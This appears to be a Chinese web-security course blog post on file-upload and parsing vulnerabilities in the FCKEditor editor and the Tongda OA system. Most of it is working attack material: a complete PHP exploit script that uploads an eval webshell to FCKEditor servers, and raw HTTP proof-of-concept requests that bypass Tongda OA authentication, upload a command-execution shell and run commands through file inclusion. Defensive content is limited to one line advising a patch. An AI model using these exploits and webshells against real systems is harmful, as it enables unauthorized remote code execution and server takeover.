• 23:WEB漏洞文件上传之解析漏洞编辑器安全


    本课重点

    • 几种常见中间件解析漏洞简要演示
      • 案例1:中间件解析漏洞思维导图
    • 几种常见Web编辑器简要演示
      • 案例2:fckeditor2.6.3 文件上传漏洞
    • 几种常见CMS文件上传简要演示
      • 案例3:通达OA文件上传+文件包含漏洞
    • 贴近实际应用下的以上知识点演示
      • 案例4:贴近实际应用下以上知识点总结

    案例1:中间件解析漏洞思维导图

    演示案例见上篇博客

    案例2:fckeditor2.6.3 文件上传漏洞

    <1>将以下exp代码复制到fck.php文件中

    <?php
    error_reporting(0);
    set_time_limit(0);
    ini_set("default_socket_timeout", 5);
    define(STDIN, fopen("php://stdin", "r"));
    $match = array();
    function http_send($host, $packet)
    {
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
    print "\n[-] No response from {$host}:80 Trying again...";
    $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    print $resp;
    return $resp;
    }
    function connector_response($html)
    {
    global $match;
    return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
    }
    print "\n+------------------------------------------------------------------+";
    print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
    print "\n+------------------------------------------------------------------+\n";
    if ($argc < 3)
    {
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /\n";
    print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
    die();
    }
    $host = $argv[1];
    $path = ereg_replace("(/){2,}", "/", $argv[2]);
    $filename = "fvck.gif";
    $foldername = "fuck.php%00.gif";
    $connector = "editor/filemanager/connectors/php/connector.php";
    $payload = "-----------------------------265001916915724\r\n";
    $payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[cmd]) ?>'."\n";
    $payload .= "-----------------------------265001916915724--\r\n";
    $packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    print $packet;
    if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
    else print "\n[-] Job done! try http://${host}/$match[2] \n";
    ?>
    

    <2>把fck.php复制到本地php的安装目录中

    <3>在命令行执行代码,成功上传后门到服务器

    <4>访问后门地址,成功利用。

    其他可参考:https://navisec.it/编辑器漏洞手册/

    案例3:通达OA文件上传+文件包含漏洞

    1漏洞描述:

    • 该漏洞在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件,组合文件包含漏洞最终造成远程代码执行漏洞,从而导致可以控制服务器system权限。

    2漏洞原理:

    • 在通达OA上传漏洞中,上传文件upload在通达OA上传漏洞中,上传文件upload.php文件中存在一个$p参数,如果$p非空就可以跳过auth.php验证机制:
    •  文件包含漏洞存在于geteway.php文件中,可直接包含url:

    3漏洞复现:

    <1>下载安装通达OA并访问

    <2>访问上传目录,我使用的是V11版本,路径为:ispirit/im/upload.php。Burp抓包构造数据包上传文件,POC为:

    POST /ispirit/im/upload.php HTTP/1.1
    Host: 192.168.1.106
    Content-Length: 658
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
    Cookie: PHPSESSID=123
    Connection: close
    
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="UPLOAD_MODE"
    
    2
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="P"
    
    123
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="DEST_UID"
    
    1
    ------WebKitFormBoundarypyfBh1YB4pV8McGB
    Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
    Content-Type: image/jpeg
    
    <?php
    $command=$_POST['cmd'];
    $wsh = new COM('WScript.shell');
    $exec = $wsh->exec("cmd /c ".$command);
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    echo $stroutput;
    ?>
    ------WebKitFormBoundarypyfBh1YB4pV8McGB--
    

    <3>发送POC,上传成功。

    <4>上传成功后访问文件包含路径/ispirit/interface/geteway.php,burp抓包构造数据包发送指令。

    POST /mac/gateway.php HTTP/1.1
    Host: 10.10.20.116:88(根据自己的IP而定)
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: python-requests/2.21.0
    Content-Length: 69
    Content-Type: application/x-www-form-urlencoded
    
    json={"url":"/general/../../attach/im/2003/941633647.jpg"}&cmd=whoami
    

    <5>命令执行成功。

    <6>也可以使用POC工具

    • https://github.com/M4tir/tongda-oa-tools
    • https://github.com/fuhei/tongda_rce

    4修复建议:

    • 更新官方补丁

    参考:https://www.cnblogs.com/twlr/p/12989951.html

    案例4:贴近实际应用下以上知识点总结

    判断中间件平台,编辑器类型或CMS名称进行测试

  • 相关阅读:
    操作系统的磁盘结构、磁盘管理、磁盘调度算法
    ArrayList源码解析--值得深读
    深入理解static、volatile关键字
    7:高阶张量操作
    6:统计属性
    5:张量的基本运算
    4.1张量的操作(broadcasting维度自动扩张,拼接与拆分)
    4:张量操作
    3:索引与切片
    2:pytorch的基本数据类型以及张量的创建
  • 原文地址:https://www.cnblogs.com/zhengna/p/15629388.html
Copyright © 2020-2023  润新知